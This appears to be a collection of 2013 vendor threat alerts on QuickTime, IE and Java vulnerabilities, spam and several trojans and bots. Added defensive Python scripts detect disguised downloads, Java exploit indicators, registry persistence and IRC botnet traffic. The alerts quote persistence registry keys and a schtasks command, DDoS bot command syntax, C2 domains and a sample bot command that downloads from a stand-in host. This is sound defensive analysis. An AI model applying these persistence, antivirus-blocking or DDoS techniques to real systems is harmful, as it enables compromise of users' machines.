Apple QuickTime M-JPEG Heap Buffer Overflow (July 5, 2013)

QuickTime is an extensible proprietary multimedia framework developed by Apple Inc. It is capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. QuickTime is integrated with Mac OS X, and it also supports Microsoft Windows.

A QuickTime movie file is a container file that can store both media metadata and media content in atoms (the basic data unit). One of the supported media contents is the Motion JPEG. Motion JPEG (M-JPEG or MJPEG) is a video format in which each video frame or interlaced field of a digital video sequence is compressed separately as a JPEG image.

A heap buffer overflow vulnerability exists in Apple QuickTime. Specifically, the vulnerability is due to insufficient validation while handling M-JPEG data in a movie file. A remote attacker can exploit this vulnerability by enticing a user to open a crafted movie file using Apple QuickTime. Successful exploitation could lead to arbitrary code execution in the security context of the logged-in user.

The vulnerability has been assigned CVE-2013-1020.

Dell SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 9960 Apple QuickTime Movie File Memory Corruption

Spam campaign roundup: The Independence Day Edition (July 3, 2013)

Tomorrow is a federal holiday in the United States that celebrates its Independence Day. The 4th of July is typically celebrated with fireworks, parades and concerts, as well as with many retailers running sales and store specials. It should no longer be a surprise that spam emails abound when big holidays or events are just around the corner. This Independence Day week, cyber criminals did not disappoint.

Over the last week, the Dell SonicWALL threats research team has been following all Independence Day related spam emails.

As July 4th approaches, we have observed an increasing amount of holiday-related spam. These emails share a common theme: luring consumers into clicking links and providing their personal information in exchange for access to deep discounts and offers. Most of these emails are poorly crafted, with evident errors in grammar and spelling. The following are some of the most common email subjects:

  • Remanning inventory must go – Updated model list – 4th July Freedom Sale
  • Ford, Chevy, BMW, Doge – 4th of July dealer blow-out
  • July 4th 2013 Special: Apple tablet and phone priced 87% lower then stores near you
  • Apple iPhone and iPad priced 93% lower then stores (4th of July pre-sale)
  • Record low prices announced for 4th of July (view them now)
  • 4th of July Booty Call Message Waiting

Some of these emails look convincing as they try to attract consumers with promises of free gift certificates. Clicking the links in the email body typically leads the user to an affiliate website, where they are asked to enter their personal information and to participate in a number of offers.

It is important to remember that these offers often cost money in fees or subscriptions without the guarantee of ever receiving the products and services or the free gift card at the end of the process.

We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

Dell SonicWALL Gateway Antivirus monitors and provides constant protection against such malicious threats.

Infostealer Trojan with Bitcoin mining and DDoS features (May 30, 2013)

The Dell SonicWALL Threats Research team came across a new Infostealer Trojan with Bitcoin mining and DDoS capabilities. This Trojan steals sensitive information from the user machine and uses the compromised system for Bitcoin mining activity as well as DDoS attacks.

Infection Cycle:

Upon execution, the Trojan creates the following files on the victim machine:

  • %Program Files%\Common Files\NT Kernal0\txklyboag.exe [Detected as GAV: Neurevt.A_4 (Trojan)]
  • %APPDATA%WinDefendersTTmacromedia.exe [Detected as GAV: Troj.SPNR_65 (Trojan)]
  • %APPDATA%WinDefendersTTshell.exe [Detected as GAV: Troj.SPNR_65 (Trojan)]
  • %APPDATA%WinDefenderstusft_ext.exe.vbs
  • %USERPROFILE%\Start Menu\Programs\Startup\Skype.lnk

It adds the following registry key to ensure infection upon reboot:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NT Kernal & System: “%Program Files%\Common Files\NT Kernal0\txklyboag.exe”

The Trojan also adds multiple registry keys to prevent the executables of various host antivirus and security tools from running. The images below show the code where the registry key values are constructed for the various security programs:

The following are examples of registry keys added on the infected system to prevent HijackThis and Malwarebytes from running:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hijackthis.exe\Debugger: “gevihsc_.exe”
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger: “enxizg_.exe”
  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe\Debugger: “bzshdt_.exe”

The Trojan injects code into wuauclt.exe, a genuine Windows process. It also checks for the presence of the following software and terminates if any is found:

It injects the dropped executable from the NT Kernal0 folder into running processes, where it acts as a watcher process for wuauclt.exe. If the injected wuauclt.exe process is terminated, the watcher process respawns wuauclt.exe and injects it with malicious code again.

The Trojan looks for the following applications on the victim machine and steals user credentials, connection details, game keys, and the user’s contact list:

  • FileZilla
  • CoreFTP
  • SmartFTP
  • FlashFXP
  • WinSCP 2.0
  • FTP Commander Deluxe
  • Skype
  • PuTTY
  • Valve Steam client
  • EA Origin client
  • Blizzard Entertainment games, League of Legends, and MineCraft

The Trojan attempts to connect to the following domains to upload the stolen information and to download the Bitcoin mining files:

  • betabros.in
  • betabros.com
  • poacher3.ipchina163.com

We also found traces of DDoS commands such as slowloris, rudy, condis, httpget and udp, as seen below:

Below are the descriptions of these commands as posted on underground forums:

  • !slowloris – Connects to a webserver through several hundred sockets per bot, and sits on it.
  • !udp – Sends mass amounts of random packets to target host/ip, perfect for home connections (SYNTAX: !udp host/ip port time) [Use ‘0’ to flood random ports]
  • !condis – Rapid connect/disconnect flood, it takes down gaming (ie. CSS) and teamspeak/VoIP servers like gravy (SYNTAX: !condis host/ip port time)
  • !httpget – Rapidly sends hundreds of HTTP GET requests every second from each bot.
  • !rudy – Slowly posts data to existing forms on a given website in many concurrent submissions.

The Trojan also disables the following Windows system services:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Neurevt.A_4 (Trojan)
  • GAV: Troj.SPNR_65 (Trojan)
  • GAV: Kryptik.BCFY (Trojan)

New Banker Trojan targeting Brazilian government site (June 28, 2013)

The Dell SonicWALL Threats Research team came across a new Banker Trojan targeting an electronic invoice website owned by the Brazilian Government’s Department of Treasury, attempting to steal sensitive user information. The Trojan arrives as a Windows Control Panel Item file and is a UPX-packed DLL written in Delphi. It pretends to be proof of an NF-e invoice and executes if the user attempts to open it.

Infection Cycle:

Upon execution, the Trojan checks for the presence of a VMware environment and terminates if one is detected.

It connects to a remote server in Brazil (grupomasterplan.com.br) to download multiple malicious executables in an encrypted format. The downloaded files are disguised as JPEG images, as seen below:

  • GET /IMAGE(REMOVED)/m.jpg [Detected as GAV: Banload.SSE#enc (Trojan)]
  • GET /IMAGE(REMOVED)/u.jpg [Detected as GAV: Banload.SSE#enc (Trojan)]
  • GET /IMAGE(REMOVED)/d.jpg [Detected as GAV: Banload.SSE#enc (Trojan)]
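Files served with a .jpg name that are really encrypted executables are easy to catch at a proxy or in a sandbox by looking at the body instead of the name: a real JPEG starts with the bytes FF D8 FF, a Windows executable starts with MZ, and an encrypted blob usually matches no known magic but has byte entropy close to 8 bits per byte. The checker below is an added example (not code from this alert); the magic table, the 7.5-bit entropy threshold and the sample bodies are constructed assumptions, with the request paths mirroring the `m.jpg`/`u.jpg` names above.

```python
import math
import random
from typing import Dict, List

# Magic-number table for the types this check distinguishes (constructed subset).
MAGIC = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"MZ", "pe"),
    (b"PK\x03\x04", "zip"),
]
# What a given URL extension claims the body to be.
EXT_TO_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif", "zip": "zip"}


def sniff(body: bytes) -> str:
    """Identify the body by its leading magic bytes, or 'unknown'."""
    for magic, kind in MAGIC:
        if body.startswith(magic):
            return kind
    return "unknown"


def shannon_entropy(body: bytes) -> float:
    """Byte entropy in bits per byte: 0 for a constant byte, 8 for a uniform distribution."""
    if not body:
        return 0.0
    counts = [0] * 256
    for b in body:
        counts[b] += 1
    n = len(body)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def assess_download(url_path: str, body: bytes, entropy_threshold: float = 7.5) -> Dict:
    """Flag a download whose content disagrees with its name or looks encrypted."""
    filename = url_path.rsplit("/", 1)[-1]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TO_KIND.get(ext)
    kind = sniff(body)
    entropy = shannon_entropy(body)
    reasons: List[str] = []
    if claimed and kind != claimed:
        reasons.append(f"served as .{ext} but content sniffs as {kind}")
    if kind == "pe":
        reasons.append("body is a Windows executable (MZ header)")
    if kind == "unknown" and entropy >= entropy_threshold:
        reasons.append(f"unrecognised format with entropy {entropy:.2f} bits/byte (encrypted or packed?)")
    return {"path": url_path, "kind": kind, "entropy": round(entropy, 2),
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample bodies (not the real downloads from the alert).
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\x00" * 64
DISGUISED_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 64
_rng = random.Random(2013)  # fixed seed so the blob is reproducible
ENCRYPTED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))  # stands in for ciphertext

if __name__ == "__main__":
    for path, body in [("/IMAGE/m.jpg", DISGUISED_PE), ("/IMAGE/u.jpg", ENCRYPTED_BLOB), ("/logo.jpg", REAL_JPEG)]:
        print(assess_download(path, body))
```

Entropy alone is a weak signal (compressed images and archives are also high-entropy), which is why the check only raises it for bodies that match no known magic; a JPEG that sniffs as a JPEG is left alone even though its data is high-entropy too.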

The following files are dropped on the infected system:

  • %Windows%\5xpg93.exe [Detected as GAV: Symmi.L_2 (Trojan)]
  • %Windows%\vj0yn.b1rf5th5 [Detected as GAV: Banker.ZRG (Trojan)]
  • C:\2013 [File-based mutex to ensure it runs only once]
  • %USERPROFILE%\Start Menu\Programs\Startup\f7xnd6.LNK [Points to %Windows%\5xpg93.exe, ensures infection upon reboot]

The Trojan installs multiple hooks and launches the website owned by the Brazilian Government’s Department of Treasury in Internet Explorer, as seen below:

Site description in English (courtesy of Google Translate):

If the user enters the Access-Key and Access-Code information, the access information is compromised by the installed hooks, even though this is the official government website:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Banload.SEE (Trojan)
  • GAV: Banker.ZRG (Trojan)
  • GAV: Banload.SSE#enc (Trojan)
  • GAV: Symmi.L_2 (Trojan)

New Drive By Download exploits Latest Java Vulnerabilities (June 7, 2013)

The Dell SonicWALL Threats Research team has found multiple drive-by-download attempts that leverage Java vulnerabilities and push corresponding malicious Java applets. On successful exploitation, these applets download a malicious executable that dupes the user into believing it is an antivirus product. Specifically, the malware uses two recent Java vulnerabilities, CVE-2013-0422 and CVE-2013-2423, and exploits either one of them to get onto the user’s system. Oracle has already patched both vulnerabilities, which are described below.

  • CVE-2013-0422: By constructing a malformed applet that uses the getMBeanInstantiator method of the JmxMBeanServer class, an attacker can achieve arbitrary code execution. The MBeanInstantiator allows the attacker to instantiate restricted classes, which eventually turns the applet into a trusted one.
  • CVE-2013-2423: An attacker can create a malformed applet that uses MethodHandles and type confusion to switch off Java’s security mechanism. Once a MethodHandle is obtained using the findStaticSetter method, a static final field can be overwritten, causing type confusion.

The following is the sequence of events that leads to a drive-by download:

The user visits an infected web page containing a malicious, obfuscated JavaScript.

The script tries to determine the vulnerable Java version.

The malicious applet exploiting CVE-2013-0422 is downloaded as per the first conditional check. The following are excerpts from the decompiled Java class files that show the vulnerable method, getMBeanInstantiator, provided by the class JmxMBeanServer.

Above, the “ctrpq” function de-obfuscates the string to getMBeanInstantiator, which is the vulnerable method.

The same “ctrpq” function also yields the class name com.sun.jmx.mbeanserver.JmxMBeanServer, which provides the vulnerable method.

The malicious applet exploiting CVE-2013-2423 is downloaded as per the second conditional check. The following are some of the decompiled Java instructions that employ the vulnerable MethodHandles API, which again is obfuscated.

We can see the “eklaqkjz” function yields the string java.lang.invoke.MethodHandles.

A malicious executable is downloaded and executed once the exploit runs successfully.
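The decompiled excerpts above turn on a handful of names: the restricted class com.sun.jmx.mbeanserver.JmxMBeanServer and its getMBeanInstantiator method for CVE-2013-0422, and java.lang.invoke.MethodHandles with findStaticSetter for CVE-2013-2423. A static triage step for captured applets is to walk the class file's constant pool and look for those names. The scanner below is an added example, not code from this alert or from Oracle; it parses the constant pool as laid out in the JVM specification (tag 1 is a length-prefixed Utf8 entry, the other tags have fixed sizes, Long and Double take two slots) and normalises slash-separated internal names to dotted form so a reflective `Class.forName("com.sun...")` literal and a direct class reference match the same indicator. The sample class file is constructed from a hand-built constant pool. The caveat is the one the alert itself illustrates: the samples decode these strings at runtime through functions like “ctrpq”, so a pool scan catches only unobfuscated variants, and MethodHandles is legitimately used by ordinary code, so these are indicators for a closer look rather than verdicts.

```python
import struct
from typing import Dict, List

CLASS_MAGIC = b"\xca\xfe\xba\xbe"
# Byte length of the fixed-size constant pool entries by tag (JVM spec 4.4).
# CONSTANT_Utf8 (tag 1) is variable-length and handled separately.
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
              15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
TWO_SLOT_TAGS = {5, 6}  # Long and Double occupy two constant pool indices

# Names the alert ties to each CVE, in dotted form.
INDICATORS = {
    "CVE-2013-0422": ["com.sun.jmx.mbeanserver.JmxMBeanServer", "getMBeanInstantiator"],
    "CVE-2013-2423": ["java.lang.invoke.MethodHandles", "findStaticSetter"],
}


def constant_pool_strings(data: bytes) -> List[str]:
    """Return every CONSTANT_Utf8 string in the class file's constant pool."""
    if data[:4] != CLASS_MAGIC:
        raise ValueError("not a Java class file")
    (count,) = struct.unpack_from(">H", data, 8)   # after magic, minor, major
    off, index, strings = 10, 1, []
    while index < count:
        tag = data[off]
        off += 1
        if tag == 1:
            (length,) = struct.unpack_from(">H", data, off)
            off += 2
            strings.append(data[off:off + length].decode("utf-8", "replace"))
            off += length
        elif tag in FIXED_SIZE:
            off += FIXED_SIZE[tag]
            if tag in TWO_SLOT_TAGS:
                index += 1
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {off - 1}")
        index += 1
    return strings


def scan_class(data: bytes) -> Dict[str, List[str]]:
    """Map each CVE to the indicator names found in the class, normalising '/' to '.'."""
    dotted = [s.replace("/", ".") for s in constant_pool_strings(data)]
    hits = {}
    for cve, needles in INDICATORS.items():
        found = sorted({n for n in needles if any(n in s for s in dotted)})
        if found:
            hits[cve] = found
    return hits


# --- constructed sample class file: constant pool only, remaining header fields zeroed ---
def _utf8(s: str) -> bytes:
    b = s.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(b)) + b


def _cls(i: int) -> bytes:
    return b"\x07" + struct.pack(">H", i)


def _str(i: int) -> bytes:
    return b"\x08" + struct.pack(">H", i)


def _long(v: int) -> bytes:
    return b"\x05" + struct.pack(">q", v)


_POOL = [
    _utf8("com.sun.jmx.mbeanserver.JmxMBeanServer"),  # 1: dotted literal, as passed to Class.forName
    _str(1),                                            # 2
    _utf8("getMBeanInstantiator"),                      # 3
    _utf8("java/lang/Object"),                          # 4: internal (slash) form of a class name
    _cls(4),                                            # 5
    _long(0x1234),                                      # 6 (also occupies slot 7)
    _utf8("java/lang/invoke/MethodHandles$Lookup"),     # 8
    _cls(8),                                            # 9
]
# minor 0, major 51 (Java 7), constant_pool_count 10, then seven zeroed u2 fields
SAMPLE_CLASS = CLASS_MAGIC + struct.pack(">HHH", 0, 51, 10) + b"".join(_POOL) + b"\x00" * 14

if __name__ == "__main__":
    print(scan_class(SAMPLE_CLASS))
```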

The threat team has added the following signatures to stop these attacks:

  • IPS: 9925 “Malformed Java Class File 2” covers CVE-2013-0422
  • IPS: 9926 “Malformed Java Class File 3” covers CVE-2013-2423
  • GAV: Kryptik.BCHO

Apple QuickTime TeXML Memory Corruption (June 26, 2013)

QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows XP and later, as well as Mac OS X Leopard and later operating systems. Apple QuickTime supports a number of native file formats to store images, audio, and movies such as .mov for movies and .pct for image files.

TeXML was developed as an open-source project with the aim of automatically presenting XML data as PDF with sophisticated layout properties. An example of an XML document that has already been transformed into the TeXML structure:

      \documentclass[a4paper]{article}
      \usepackage[latin1]{inputenc}
      \usepackage[T1]{fontenc}

      Misinterpretation of special characters as being functional characters is called "Escaping", thus: $, ^, >

QuickTime TeXML has a specific format for constructing 3GPP-compliant timed text tracks in a QuickTime movie file. The following example demonstrates a typical TeXML file:

      This is a simple run of text.

A memory corruption vulnerability exists in Apple QuickTime. A remote attacker can exploit this vulnerability by enticing a user to download and process a specially crafted TeXML file with the vulnerable software. This can lead to code execution in the context of the vulnerable application.

The Dell SonicWALL threat team has researched this vulnerability and released the following IPS signatures to address the issue:

  • 9957 Apple QuickTime TeXML Memory Corruption Buffer Overflow 1
  • 9958 Apple QuickTime TeXML Memory Corruption Buffer Overflow 2

This vulnerability has been assigned CVE-2013-1015.

Windows IE Use-After-Free Vulnerability MS13-047 (June 21, 2013)

Internet Explorer is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems. It is one of the most widely used web browsers. It is capable of rendering static and dynamic web content, as well as other web browsing related tasks such as displaying HTML pages, downloading files, parsing various image formats, running different types of multimedia content, and opening files in various formats using various plugins.

The Document Object Model (DOM) is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. Objects in the DOM tree may be addressed and manipulated by using methods on the objects. The public interface of a DOM is specified in its application programming interface (API). Starting with version 6, Internet Explorer supports the DOM structure. In the DOM, all HTML tags and their attributes are stored in a tree-like structure as nodes, along with the text and other literal data that form the leaves of this tree. IE supports dynamic manipulation of the DOM through client-side scripting.

A use-after-free vulnerability exists in Microsoft Internet Explorer in its handling of one of the DOM objects. The vulnerability allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) in Microsoft Internet Explorer 6 through 10 via a crafted web site. Any successfully injected code is executed in the context of the currently logged-on user.

The Dell SonicWALL threat team has researched this vulnerability and released the following IPS signature:

  • 9954 Windows IE Use-After-Free Vulnerability (MS13-047) 15

This vulnerability has been assigned CVE-2013-3121.

A wave of C++ based IRCBot discovered in the wild (June 21, 2013)

The Dell SonicWALL Threats Research team has observed a recent wave of a C++ based IRC bot that is very similar to a bot covered in a previous alert. This bot appears to be hosted on compromised legitimate websites, aiming to infect unsuspecting web surfers who visit them. The bot installer may arrive on the computer with file names such as quick.exe, wmplayer.exe or check.exe, with the following file properties:

Infection Cycle:

Upon execution, the bot creates copies of itself in the following locations:

  • %windir%\-(random digits)\unsecapp.exe [Detected as GAV: Injector.AHXY (Trojan)]
  • %temp%\file.exe [Detected as GAV: Injector.AHXY (Trojan)]

To start after a reboot, the bot adds the following keys to the registry:

  • HKCU\software\microsoft\windows\currentversion\run [adobeupdate] “%temp%\file.exe”
  • HKCU\software\microsoft\windows\currentversion\runonce [*-(random digits)] “%windir%\-(random digits)\unsecapp.exe”
  • HKLM\software\microsoft\windows\currentversion\runonce [*-(random digits)] “%windir%\-(random digits)\unsecapp.exe”

It also executes the following command to run itself with the highest privileges whenever a user logs on:

  • %system%\schtasks.exe [SCHTASKS /CREATE /SC ONLOGON /TN A-(*random folder name*) /TR %windir%\-(random digits)\unsecapp.exe /RL HIGHEST]

The bot modifies the values of the following registry keys to hide its presence within the system:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions dword:00000001
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden dword:00000002

It also disables Windows Update by modifying the following registry key:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate dword:00000001
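The registry changes in this alert and in the Neurevt infostealer alert above are the same three families a host audit can look for: Image File Execution Options Debugger values that redirect a security tool to a bogus executable, Run/RunOnce autostart entries pointing into user-writable locations, and Policies\Explorer values that hide files or switch off Windows Update. The script below is an added example, not code from either alert; it parses a `reg export`-style text and applies those three rules. The allowlist of legitimate IFEO debuggers and the user-writable path fragments are assumptions to adjust for your estate, and the sample export is constructed from values named on this page (the mbam.exe Debugger, the adobeupdate Run entry, NoFolderOptions, Hidden and NoWindowsUpdate) plus two benign entries for contrast.

```python
import ntpath
import re
from typing import Dict, List, Union

RegKeys = Dict[str, Dict[str, Union[str, int]]]

# A value line in a .reg export: "name"=... or @=... for the default value.
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
# Debuggers legitimately registered under IFEO (assumed allowlist).
KNOWN_DEBUGGERS = {"vsjitdebugger.exe", "windbg.exe", "ntsd.exe", "cdb.exe", "drwtsn32.exe"}
# Path fragments marking user-writable locations (assumed; extend as needed).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")


def _unescape(s: str) -> str:
    """Undo .reg escaping: a backslash quotes the character after it."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text: str) -> RegKeys:
    """Parse the subset of the .reg format needed here: keys, string values, dword values."""
    keys: RegKeys = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = _unescape(m.group(1)) if m.group(1) is not None else "@"
        raw = m.group(2).strip()
        if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            keys[current][name] = _unescape(raw[1:-1])
        elif raw.lower().startswith("dword:"):
            keys[current][name] = int(raw[6:], 16)
        else:
            keys[current][name] = raw  # hex:/expandable strings kept verbatim
    return keys


def _first_token(command: str) -> str:
    """The executable part of a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        close = command.find('"', 1)
        return command[1:close] if close > 0 else command[1:]
    return command.split()[0] if command else ""


def audit(keys: RegKeys) -> List[Dict[str, str]]:
    findings = []
    for key, values in keys.items():
        k = key.lower()
        if "\\image file execution options\\" in k:
            debugger = next((v for n, v in values.items() if n.lower() == "debugger"), None)
            if debugger is not None:
                target = ntpath.basename(_first_token(str(debugger))).lower()
                if target not in KNOWN_DEBUGGERS:
                    findings.append({"rule": "ifeo-debugger", "key": key, "name": "Debugger",
                                     "detail": f"{ntpath.basename(key)} is redirected to {target!r}"})
        elif k.endswith("\\currentversion\\run") or k.endswith("\\currentversion\\runonce"):
            for name, value in values.items():
                if any(frag in _first_token(str(value)).lower() for frag in USER_WRITABLE):
                    findings.append({"rule": "autostart-user-writable", "key": key,
                                     "name": name, "detail": str(value)})
        elif k.endswith("\\policies\\explorer"):
            for name in ("NoFolderOptions", "NoWindowsUpdate"):
                if values.get(name) == 1:
                    findings.append({"rule": "explorer-policy", "key": key,
                                     "name": name, "detail": "restriction enabled"})
        elif k.endswith("\\policies\\explorer\\advanced") and values.get("Hidden") == 2:
            findings.append({"rule": "explorer-policy", "key": key,
                             "name": "Hidden", "detail": "hidden files forced not to show"})
    return findings


def audit_text(reg_export: str) -> List[Dict[str, str]]:
    return audit(parse_reg(reg_export))


# Constructed sample export: page values plus a legitimate JIT debugger and a benign Run entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"Debugger"="enxizg_.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Windows\\System32\\vsjitdebugger.exe\" -p"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"adobeupdate"="C:\\Users\\victim\\AppData\\Local\\Temp\\file.exe"
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001
"NoWindowsUpdate"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced]
"Hidden"=dword:00000002
'''

if __name__ == "__main__":
    for finding in audit_text(SAMPLE_REG):
        print(finding)
```

The IFEO rule is the highest-signal one: a Debugger value under a security tool's image name that points at anything other than a real debugger has no benign explanation, and the bogus targets in this family (gevihsc_.exe, enxizg_.exe) do not even exist on disk, so the tool simply fails to launch.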

It connects to an IRC server:

And then joins an IRC channel named #marketevo:

Upon successful connection to an IRC server, a bot will typically wait for commands from its operator. The following command names, present in the binary’s strings, show the range of actions an attacker can trigger:

  • decrypt
  • download
  • update
  • arguments
  • ftp.upload
  • filesearch
  • silent
  • connect
  • notice
  • invite
  • flood.channel
  • kill.user

Within minutes of joining the #marketevo channel, we noticed an influx of users joining from presumably infected machines in different parts of the world.

During our analysis, we also observed the bot sending private messages to the channel:
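On the wire, what the analysis above describes is plain IRC: a JOIN to the #marketevo channel followed by PRIVMSG lines carrying operator commands. A network sensor that already reassembles IRC can flag both. The script below is an added example, not code from this alert; it parses IRC lines into prefix, command and parameters (the trailing `:text` becoming the last parameter), then raises an alert for a JOIN to the channel named in this alert and for a PRIVMSG whose first word is a `!`- or `.`-prefixed name from the command list above. The prefix requirement is an assumption borrowed from the `!slowloris`-style syntax quoted in the Neurevt alert and keeps ordinary chat that happens to start with "download" from matching; the session lines are constructed.

```python
from typing import List, Optional, Tuple

# Command vocabulary from the alert's string listing, and the channel it names.
BOT_COMMANDS = {"decrypt", "download", "update", "arguments", "ftp.upload", "filesearch",
                "silent", "connect", "notice", "invite", "flood.channel", "kill.user"}
C2_CHANNELS = {"#marketevo"}


def parse_irc_line(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split an IRC line into (prefix, COMMAND, params); a trailing ':text' is the last param."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, _, trailing = line.partition(" :")
    else:
        head, trailing = line, None
    parts = head.split()
    if not parts:
        raise ValueError("empty IRC line")
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return prefix, parts[0].upper(), params


def analyze_session(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, alert_kind, value) for each suspicious line in a session."""
    alerts = []
    for n, raw in enumerate(lines, 1):
        _, command, params = parse_irc_line(raw)
        if command == "JOIN" and params and params[0].lower() in C2_CHANNELS:
            alerts.append((n, "join-c2-channel", params[0]))
        elif command == "PRIVMSG" and len(params) >= 2:
            words = params[-1].split()
            # Only a prefixed command word counts, so "download the slides" in chat does not match.
            if words and words[0][:1] in "!." and words[0][1:].lower() in BOT_COMMANDS:
                alerts.append((n, "bot-command", words[0][1:].lower()))
    return alerts


# Constructed session: a bot registering, joining the channel, and receiving two commands.
SAMPLE_SESSION = [
    "NICK victim-a1b2",
    "USER victim 0 * :victim",
    ":irc.c2.invalid 001 victim-a1b2 :Welcome to the network",
    "JOIN #marketevo",
    ":op!op@c2.invalid PRIVMSG #marketevo :!download http://files.c2.invalid/update.exe",
    ":op!op@c2.invalid PRIVMSG victim-a1b2 :!update",
    ":victim-a1b2!victim@10.0.0.5 PRIVMSG #marketevo :[DOWNLOAD]: done",
    ":op!op@c2.invalid PRIVMSG #marketevo :hello all",
]

if __name__ == "__main__":
    for alert in analyze_session(SAMPLE_SESSION):
        print(alert)
```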

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Injector.AHXY (Trojan)

New Adware Trojan plays continuous audio ads (June 14, 2013)

The Dell SonicWALL Threats Research team has discovered a new adware Trojan that plays a continuous stream of audio advertisements in the background. The content of the ads ranges from dating to politics. The audio can originate from various sources, such as video links on YouTube pages.

Infection Cycle:

The Trojan uses the following icon:

The following is a sample of DNS queries made by the Trojan:

The Trojan adds the following files to the filesystem:

  • %PROGRAMFILES%\K14R\feeds\avcodec-53.dll
  • %PROGRAMFILES%\K14R\feeds\avformat-53.dll
  • %PROGRAMFILES%\K14R\feeds\avutil-51.dll
  • %PROGRAMFILES%\K14R\feeds\Awesomium.dll
  • %PROGRAMFILES%\K14R\feeds\awesomium.log
  • %PROGRAMFILES%\K14R\feeds\awesomium_pak_utility.exe
  • %PROGRAMFILES%\K14R\feeds\awesomium_process.exe
  • %PROGRAMFILES%\K14R\feeds\Cache\data_0
  • %PROGRAMFILES%\K14R\feeds\Cache\data_1
  • %PROGRAMFILES%\K14R\feeds\Cache\data_2
  • %PROGRAMFILES%\K14R\feeds\Cache\data_3
  • %PROGRAMFILES%\K14R\feeds\Cache\f_000001 – 00004b
  • %PROGRAMFILES%\K14R\feeds\Cache\index
  • %PROGRAMFILES%\K14R\feeds\Cookies
  • %PROGRAMFILES%\K14R\feeds\google_result.jpg
  • %PROGRAMFILES%\K14R\feeds\icudt.dll
  • %PROGRAMFILES%\K14R\feeds\kworker.exe
  • %PROGRAMFILES%\K14R\feeds\libEGL.dll
  • %PROGRAMFILES%\K14R\feeds\libGLESv2.dll
  • %PROGRAMFILES%\K14R\feeds\Local Storage
  • %PROGRAMFILES%\K14R\feeds\Local Storage\https_www.google.com_0.localstorage
  • %PROGRAMFILES%\K14R\feeds\referers.txt
  • %PROGRAMFILES%\K14R\feeds\SDL.dll
  • %PROGRAMFILES%\K14R\feeds\silentium.exe [Detected as GAV: Clicker.BDIK (Adware)]
  • %PROGRAMFILES%\K14R\feeds\x86\NPSWF32_11_5_502_135.dll
  • %PROGRAMFILES%\K14R\feeds\youtube_result.jpg
  • %PROGRAMFILES%\K14R\lupdater.exe [Detected as GAV: MalAgent.G_2412 (Trojan)]
  • %PROGRAMFILES%\K14R\snupdater.exe [Detected as GAV: Clicker.BDHP (Adware)]
  • %PROGRAMFILES%\K14R\uvname.conf
  • %PROGRAMFILES%\K14R\versions.conf
  • %PROGRAMFILES%\K14R\WindowsService.exe [Detected as GAV: Clicker.BBII (Adware)]

The cache directory contains HTML data from webpages that it visits.

